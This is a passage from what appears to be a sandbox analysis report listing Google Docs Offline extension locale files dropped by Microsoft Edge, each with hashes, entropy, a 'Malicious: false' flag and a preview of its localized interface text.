Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\nn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
